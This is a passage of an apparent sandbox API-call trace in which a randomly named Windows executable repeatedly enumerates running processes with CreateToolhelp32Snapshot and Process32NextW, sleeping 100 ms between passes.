th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.952] Sleep (dwMilliseconds=0x64) [0222.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0222.092] Process32FirstW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.092] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.093] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.093] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.093] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.094] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.094] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.094] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.094] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.095] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.095] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.095] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.095] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.096] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.096] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.096] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.097] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.097] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.097] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.098] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.098] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.098] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.098] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.099] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.099] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.099] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.100] Process32NextW (in: hSnapshot=0x240, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.100] Sleep (dwMilliseconds=0x64) [0222.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x244 [0222.238] Process32FirstW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.238] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.238] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.239] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.239] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.239] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.239] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.240] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.240] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.240] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.241] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.241] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.241] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.241] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.242] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.242] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.242] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.243] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.243] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.243] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.243] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.244] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.244] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.244] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.245] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.245] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.245] Process32NextW (in: hSnapshot=0x244, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.245] Sleep (dwMilliseconds=0x64) [0222.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x248 [0222.371] Process32FirstW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.371] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.372] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.372] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.372] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.373] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.373] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.373] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.373] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.374] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.374] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.374] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.374] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.375] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.375] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.375] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.376] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.376] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.376] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.376] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.377] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.377] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.377] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.378] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.378] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.378] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.379] Process32NextW (in: hSnapshot=0x248, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.379] Sleep (dwMilliseconds=0x64) [0222.517] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24c [0222.519] Process32FirstW (in: hSnapshot=0x24c, 